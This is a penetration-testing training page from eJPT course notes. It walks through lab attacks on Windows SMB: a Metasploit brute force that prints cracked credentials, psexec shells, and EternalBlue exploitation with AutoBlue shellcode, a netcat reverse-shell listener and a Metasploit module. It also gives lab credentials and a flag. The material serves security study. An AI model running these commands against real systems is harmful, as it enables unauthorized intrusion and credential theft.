INE Training Notes - by syselement
🏠 Home BlogGitHub📚 Buy Me a Book
  • INE Training Notes
  • Courses
    • eJPT - PTSv2
      • 📒Penetration Testing Prerequisites
        • Introduction
        • Networking
        • Web Applications
      • 📒1. Assessment Methodologies & Auditing
        • Information Gathering
        • Footprinting & Scanning
        • Enumeration
          • 🔬SMB Enum
          • 🔬FTP Enum
          • 🔬SSH Enum
          • 🔬HTTP Enum
          • 🔬MYSQL Enum
          • 🔬SMTP Enum
        • Vulnerability Assessment
        • Auditing Fundamentals
      • 📒2. Host & Network Penetration Testing
        • System/Host Based Attacks
          • 🪟Windows Attacks
            • 🔬IIS - WebDAV
            • 🔬SMB - PsExec
            • 🔬RDP
            • 🔬WinRM
            • 🔬Win Kernel Privesc
            • 🔬UAC Bypass
            • 🔬Access Token
            • 🔬Alternate Data Stream
            • 🔬Credentials Dumping
          • 🐧Linux Attacks
            • 🔬Bash
            • 🔬FTP
            • 🔬SSH
            • 🔬SAMBA
            • 🔬Cron Jobs
            • 🔬SUID
            • 🔬Hashes Dumping
        • Network Based Attacks
          • 🔬Tshark, ARP, WiFi
        • The Metasploit Framework (MSF)
          • 🔬HFS - MSF Exploit
          • 🔬Tomcat - MSF Exploit
          • 🔬FTP - MSF Exploit
          • 🔬Samba - MSF Exploit
          • 🔬SSH - MSF Exploit
          • 🔬SMTP - MSF Exploit
          • 🔬Meterpreter - MSF
          • 🔬Win Post Exploitation - MSF
          • 🔬Linux Post Exploitation - MSF
        • Exploitation
          • 🔬Fixing Exploits - HFS
          • 🔬Win Workflow Platform - MSF
          • 🔬Win Black Box Pentest
          • 🔬Linux Black Box Pentest
        • Post-Exploitation
          • 🔬Windows Post-Exploitation
          • 🔬Windows Privilege Escalation
          • 🔬Windows Persistence
          • 🔬Linux Post-Exploitation
          • 🔬Linux Privilege Escalation
          • 🔬Linux Persistence
          • 🔬Cracking Hashes
          • 🔬Pivoting
        • Social Engineering
      • 📒3. Web Application Penetration Testing
        • Intro to Web App Pentesting
          • 🔬HTTP Enumeration
          • 🔬Web App Scanning
          • 🔬Web App Attacks
      • 🔬Exam Preparation - Labs
        • PTSv1 Prerequisites Labs
          • 🔬HTTP(S) Traffic Sniffing
          • 🔬Find the Secret Server
          • 🔬Data Exfiltration
          • 🔬Burp Suite Basics - Directory Enumeration
        • PTSv2 Practice Labs
      • 🌐eJPT References
      • 📜eJPT Cheat Sheet
    • ICCA
      • 📒1. Cloud Foundations
      • 📒2. Cloud Management Concepts
      • 📒3. Cloud Identity, Security, and Compliance
      • 🌐Icca References
    • eMAPT
      • 📒Android
      • 📒iOS
      • 🌐eMAPT References
  • 🏠syselement's Blog Home
Powered by GitBook
On this page
  • Lab 1
  • Enumeration
  • SMB Brute-force
  • SMB Exploitation
  • Lab 2 - Eternal Blue (Extra)
  • Enumeration
  • Manual Exploitation
  • Automatic Exploitation

Was this helpful?

Edit on GitHub
  1. Courses
  2. eJPT - PTSv2
  3. 📒2. Host & Network Penetration Testing
  4. System/Host Based Attacks
  5. Windows Attacks

🔬SMB - PsExec

Previous🔬IIS - WebDAVNext🔬RDP

Last updated 2 years ago

Was this helpful?

Lab 1

🔬

  • Target IP: 10.4.16.36

  • SMB exploitation

  • Dictionaries to use:

    • /usr/share/metasploit-framework/data/wordlists/common_users.txt

    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Enumeration

ping 10.4.16.36

nmap -sV -sC 10.4.16.36
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=EC2AMAZ-408S766
| Not valid before: 2023-03-11T17:43:37
|_Not valid after:  2023-09-10T17:43:37
|_ssl-date: 2023-03-12T17:47:48+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-12 23:17:49
|_  start_date: 2023-03-12 23:13:37

📌 SMB version 2.02

SMB Brute-force

    • The brute force success is based on the users and password used.

msfconsole
search smb_login
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.4.16.36
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
exploit
[+] 10.4.16.36:445 - 10.4.16.36:445 - Success: '.\sysadmin:samantha'
[+] 10.4.16.36:445 - 10.4.16.36:445 - Success: '.\demo:victoria'
[+] 10.4.16.36:445 - 10.4.16.36:445 - Success: '.\auditor:elizabeth'
[+] 10.4.16.36:445 - 10.4.16.36:445 - Success: '.\administrator:qwertyuiop' Administrator

SMB Exploitation

    • Using this technique, no exploit is launched or uploaded on the target system.

    • It is a legitimate authentication with the actual credentials and the use of an official tool (psexec).

psexec.py Administrator@10.4.16.36 cmd.exe
    • This technique will upload and run a (malicious) payload on the target. Pay attention to the antivirus!

msfconsole
search psexec
use exploit/windows/smb/psexec
set RHOSTS 10.4.16.36
set SMBUser Administrator
set SMBPass qwertyuiop
# Make sure the LHOST = your host IP address
exploit
  • Find the flag, running meterpreter commands

shell
# will provide a cmd shell on the target machine
cd \
dir
type flag.txt
Reveal Flag: 🚩

e0da81a9cd42b261bc9b90d15f780433


Lab 2 - Eternal Blue (Extra)

🔬 Home Lab

I have prepared a vulnerable Windows 2008 R2 Virtual Machine and connected it to the same network of the Kali virtual machine. On the server, I have activated File Services role and created a shared folder with the Administrators Group.

  • Host system: Kali Linux

  • Target system: Windown Server 2008 R2 - IP 192.168.31.131 - Administrator:Eternal17010

Enumeration

nmap -sV -sC 192.168.31.131
sudo nmap --script smb-vuln-ms17-010 -p445  192.168.31.131
  • 📌 The system is vulnerable to the CVE-2017-0143

Manual Exploitation

cd
mkdir tools
cd /home/kali/tools
sudo git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git 
cd AutoBlue-MS17-010
pip install -r requirements.txt
  • Generate a shellcode that will be exploited on the target system.

cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh
# LHOST = Host Kali Linux IP
# LPORT = Port Kali will listen for the reverse shell
  • Set a netcat listener on the specified port, in another terminal tab

nc -nvlp 1234
  • In the AutoBlue terminal tab, use the eternalblue_exploit7.py to exploit the target from the AutoBlue-MS17-010 directory

cd ..
chmod +x eternalblue_exploit7.py
python eternalblue_exploit7.py 192.168.31.131 shellcode/sc_x64.bin
  • Check the netcat tab for the reverse shell

Automatic Exploitation

msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.31.131
exploit

Use Metasploit module to brute force SMB

Use script for Linux (from the ) to get a command prompt on the target machine, with the Administrator account.

Alternatively to the Python script, use Metasploit module to get a meterpreter session on the target system.

Exploitation tool:

Vulnerability: +

will be used for the manual exploitation

🪟
Windows: SMB Server PSexec
smb_login
PsExec.py
impacket-scripts
psexec
AutoBlue-MS17-010
CVE-2017-0143 - EternalBlue
CVE-2017-0144
AutoBlue-MS17-010
Metasploit smb_login
psexec.py
Metasploit psexec
nmap -sV -sC 192.168.31.131
sudo nmap --script smb-vuln-ms17-010 -p445 192.168.31.131
./shell_prep.sh
Reverse Shell Success
Metasploit ms17_010_eternalblue